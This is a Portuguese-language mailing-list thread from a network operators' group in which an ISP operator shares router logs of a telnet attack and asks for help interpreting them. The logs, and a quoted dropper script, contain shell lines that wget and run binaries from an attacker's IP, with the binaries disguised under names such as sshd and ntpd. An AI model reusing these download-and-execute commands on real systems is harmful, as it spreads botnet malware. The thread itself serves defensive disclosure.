[GTER] Script Telnet - Aviso
Guilherme Boing
kolt at frag.com.br
Wed Jun 22 11:16:53 -03 2016
Basicamente ele tenta rodar isso em todos que não possuem autenticação.
2016-06-22 10:16 GMT-03:00 Marlon Casarotto <marlon at mksnet.com.br>:
> Bom dia Srs.
>
>
>
> Hoje pela manhã, deparei com alguns log no mínimo estranho, no caso
> identifique em um terminal MK. O atacante usou um parâmetro completo, onde
> usa o wget para download de um scrip, que por si tem vários outros wget
> para
> outros arquivos. Gostaria de saber se alguém observou algo semelhante em
> seus router, e também do pessoal mais experiente se pode dizer do que se
> trata. Nesse caso era um router com porta telnet default (falha já
> corrigida). Como já ocorreu com UBNT talvez alguém esteja tentando explorar
> alguma falha ou outra plataforma, no meu caso não houve prejuízo, mas isso
> pode servir de alerta e informação para os demais. Pode não ser nada,
> massss.
>
>
>
> Grato
>
>
>
> Dados do IP
>
> http://bgp.he.net/ip/69.30.214.122
>
>
>
> Segue o LOG.
>
>
>
> jun/22/2016 07:01:56 system,error,critical login failure for user cd /tmp
> ||
> cd / ar/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/bins.sh;> http://69.30.214.122/bins.sh; chmod2;
> chmod
> 777 tftp2.sh; sh tftp2. from 122.52.173.152 via telnet
> jun/22/2016 07:02:04 system,error,critical login failure for user cd /tmp
> ||
> cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/bins.sh;> http://69.30.214.122/bins.sh; chmod777
> bins.sh; sh bins.sh; tftp 6 from 122.52.173.152 via telnet
> jun/22/2016 07:02:05 system,error,critical login failure for user
> 9.30.214.122 –c wget tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r
> tftp2.sh -g 69.30.214.122; chmod 777 tftp2.sh; sh tftp2. from
> 122.52.173.152
> via telnet
> jun/22/2016 07:02:09 system,error,critical login failure for user sh from
> 122.52.173.152 via telnet
> jun/22/2016 07:02:14 system,error,critical login failure for user cd /tmp
> ||
> cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/bins.sh;> http://69.30.214.122/bins.sh; chmod777
> bins.sh; sh bins.sh; tftp 6 from 122.52.173.152 via telnet
> jun/22/2016 07:02:15 system,error,critical login failure for user
> 9.30.214.122 -cget tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r
> tftp2.sh -g 69.30.214.122; chmod 777 tftp2.sh; sh tftp2. from
> 122.52.173.152
> via telnet
>
>
>
>
>
> E esse é o script
>
>
> #!/bin/bash
> cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/ntpd;> http://69.30.214.122/ntpd; chmod +x ntpd;
> ./ntpd; rm -rf ntpd
> cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/sshd;> http://69.30.214.122/sshd; chmod +x sshd;
> ./sshd; rm -rf sshd
> cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/openssh;> http://69.30.214.122/openssh; chmod +x
> openssh; ./openssh; rm -rf openssh
> cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/bash;> http://69.30.214.122/bash; chmod +x bash;
> ./bash; rm -rf bash
> cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/tftp;> http://69.30.214.122/tftp; chmod +x tftp;
> ./tftp; rm -rf tftp
> cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/wget;> http://69.30.214.122/wget; chmod +x wget;
> ./wget; rm -rf wget
> cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/cron;> http://69.30.214.122/cron; chmod +x cron;
> ./cron; rm -rf cron
> cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/ftp;> http://69.30.214.122/ftp; chmod +x ftp; ./ftp;
> rm -rf ftp
> cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/pftp;> http://69.30.214.122/pftp; chmod +x pftp;
> ./pftp; rm -rf pftp
> cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/sh;> http://69.30.214.122/sh; chmod +x sh; ./sh; rm
> -rf sh
> cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/%5bcpu%5d;> http://69.30.214.122/[cpu]; chmod +x
> [cpu]; ./[cpu]; rm -rf [cpu]
> cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/apache2;> http://69.30.214.122/apache2; chmod +x
> apache2; ./apache2; rm -rf apache2
> cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
> <http://69.30.214.122/telnetd;> http://69.30.214.122/telnetd; chmod +x
> telnetd; ./telnetd; rm -rf telnetd
>
>
>
>
>
>
>
> Marlon Casarotto
>
>
>
>
>
> --
> gter list https://eng.registro.br/mailman/listinfo/gter
>
More information about the gter
mailing list